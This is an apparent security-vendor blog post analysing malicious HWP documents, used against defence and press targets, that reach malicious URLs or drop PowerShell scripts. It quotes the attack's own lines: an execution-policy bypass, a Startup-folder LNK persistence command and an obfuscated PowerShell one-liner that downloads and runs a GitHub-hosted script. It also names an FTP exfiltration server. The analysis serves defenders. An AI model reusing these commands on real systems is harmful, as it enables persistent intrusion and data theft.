Warning Against HWP Documents Embedded with Malicious OLE Objects

AhnLab Security Emergency response Center (ASEC) found HWP documents that were embedded with OLE objects, targeting individuals in specific sectors such as the national defense and the press. The malware is presumed to be distributed mainly through download URLs or attachments in emails. The file names of the distributed documents are relevant to the areas of national defense, unification, education, and broadcasting, suggesting that the malware targets professionals involved in these areas.

The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that creates an additional script file. [Type 2] has a similar operation method to the malware covered in a previous post [1] and also uses the same FTP server password. Such similarities allow us to believe that they were made by the same person.

The figure below shows a brief flow of operations of each type.

Figure 1. Operation process

<Type 1>

This type accesses an external URL through an OLE object embedded in the HWP documents. Below are the file names of HWP documents presumed to be this type.

DateFile name
May 25, 2023Unification** cue sheet May 29 Mon.hwp
May 25, 202320230508_ProfessorMeetingMaterial_NewTemplate.hwp
May 25, 2023(***)2023-05-30 Material for Professor Meeting.hwp
May 30, 2023Payment Receipt (Chief ***).hwp
May 30, 2023(Template)Payment Receipt_Congratulatory and Condolence Money.hwp
June 22, 202320230512_MyungbakScenario_Details.hwp
June 22, 20231-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp
June 22, 2023Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp
June 23, 2023[Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp
June 29, 2023National Defense and Protection Sacrificed to Political Disputes.hwp
July 11, 2023** Unification April 30 2023 (Sun).hwp
July 17, 2023Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp
July 20, 202342- Wagner’s Lesson (Aug 2023).hwp
July 24, 2023[Template1] Business Budget Issue Request.hwp
Aug 14, 2023Dissertation Evaluation (** Kwon).hwp
Sep 01, 2023Evidentiary Documents of Incentive Payment.hwp
Sep 04, 2023** Unification Sep 06 Final Wednesday.hwp
Sep 06, 2023** Kim_Statement of Honorarium Payment.hwp
Sep 19, 2023[Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp
Table 1. Identified HWP document file names

The HWP documents identified in Table 1 contain text that prompts the user to click the OLE object for it to run.

Figure 2. Document content

In the documents, the threat actor embedded an OLE object the size of which exceeds the page boundaries (see Figure 3), so that the OLE object runs no matter where the user clicks.

Figure 3. OLE object embedded in the document

The embedded OLE object includes over 5 MB of dummy bytes and a malicious URL. Accordingly, when the user clicks the OLE object, an attempt is made to connect to the malicious URL contained within the object.

Figure 4. OLE object embedded in HWP files
Figure 5. Message box displayed when the OLE object is clicked

At the time of analysis, the URL was not available and anomalous behaviors could not be observed. The malicious URLs identified so far are as follows. It seems that these documents are being distributed to specific individuals due to the fact that each document uses a different parameter value.

  • hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
  • hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]

<Type 2>

This type has a malicious script file embedded in HWP documents, and ultimately, it executes an additional script code uploaded to GitHub. Below are the file names of HWP documents presumed to be this type.

DateFile name
July 31, 2023test.hwp
July 27, 2023Honorarium Information_aa.hwp
Aug 31, 2023Consultation Request.hwp
Sep 01, 2023Honorarium Template.hwp
Sep 14, 2023main.hwp
Oct 04, 2023test1.hwp
Table 2. Identified HWP document file names

The document “test1.hwp” listed in Table 2 contains two file attachments and an embedded hyperlink that executes the corresponding script file (zz.bat).

Figure 6. test1.hwp document content

When the HWP document is executed, the files zz.bat and oz.txt are created in the %temp% folder. When the user clicks on a blank area containing the embedded hyperlink or the zz.bat file icon, zz.bat is executed.

zz.bat contains PowerShell commands that download and execute additional data by connecting to a GitHub address inside oz.txt.

Figure 7. zz.bat file content
Figure 8. oz.txt file content

Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes a malicious script.

Figure 9. Code in hxxps://raw.githubusercontent.com/babaramam/repo/main/pq.txt
Figure 10. Script codes uploaded on GitHub

down.txt, info.txt, and upload.txt seen in Figure 10 all have obfuscated pieces of data uploaded. Upon connecting to the corresponding URLs, these pieces of data are deobfuscated with a certain key value then executed.

The PowerShell script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions. Brief descriptions of each function’s features are given below.

Function NameFeature
mainFuncChanges PowerShell policy
Functions executed in the following order: getinfo – uploadResult – downCommand
getinfoExecutes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt
Collects user PC information such as network configuration information
uploadResultExecutes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt
Uploads the collected information to the threat actor’s FTP server
downCommandExecutes the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt
Creates additional malicious files
Table 3. Features of each function

The function mainFunc which is executed first changes the current user’s PowerShell policy with the following command and enables the execution of the PowerShell script that is downloaded later on.

  • Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass –Force
Figure 11. mainFunc code

The function getinfo executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script is responsible for collecting user information. The collected pieces of information are stored in the file %APPDATA%\Ahnlab\Ahnlab.hwp.

Figure 12. getinfo code

The table below shows the collected pieces of information.

CommandCollected Information
Get-ChildItem ([Environment]::GetFolderPath(“Recent”))List of recently used files
ipconfig /allList of network configurations
Get-processList of processes
Table 4. Collected information
Figure 13. The created Ahnlab.hwp file

The function uploadResult also executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected pieces of information (%APPDATA%\Ahnlab\Ahnlab.hwp) to the threat actor before deleting it. The threat actor used FTP to collect the exfiltrated data.

Figure 14. Deobfuscated code of upload.txt
  • Address: plm.myartsonline[.]com
  • User name: 4154836

The function downCommand which is continuously executed afterward executes an obfuscated script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The script down.txt creates an additional malicious file for the malware to maintain persistence. To enable the malicious script to be executed continuously, the threat actor creates an LNK file in the Startup folder.

Figure 15. The created LNK file

The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command which executes the script uploaded to  hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
Thus, whenever the user restarts the PC, the script uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt is run.

  • LNK file command
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText(‘C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log‘);invoke-expression $x}
  • thumbs.log data
    [string]$a = {(New-Object Net.WebClient).Doqwertyutring(‘hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt‘)};$b=$a.replace(‘qwertyu’,’wnloadS’);$c=iex $b;invoke-expression $c

While no additional malicious behaviors aside from collecting user information have been observed, a variety of malicious behaviors can be performed depending on the command uploaded to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.

With the malware from the post in June [2] also being distributed through HWP documents, there are multiple malicious HWP documents in distribution nowadays. When opening an HWP document, users must pay attention to its author and the sender.

[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

5 1 vote
Article Rating
Notify of

Inline Feedbacks
View all comments

[…] analysts at ASEC recently discovered HWP documents with OLE objects, potentially distributed via email attachments or download links, […]


[…] analysts at ASEC recently discovered HWP documents with OLE objects, potentially distributed via email attachments or download links, […]


[…] analysts at ASEC recently discovered HWP documents with OLE objects, potentially distributed via email attachments or download links, […]


[…] analysts at ASEC just lately found HWP paperwork with OLE objects, doubtlessly distributed through e mail attachments or obtain […]


[…] analysts at ASEC recently discovered HWP documents with OLE objects, potentially distributed via email attachments or download links, […]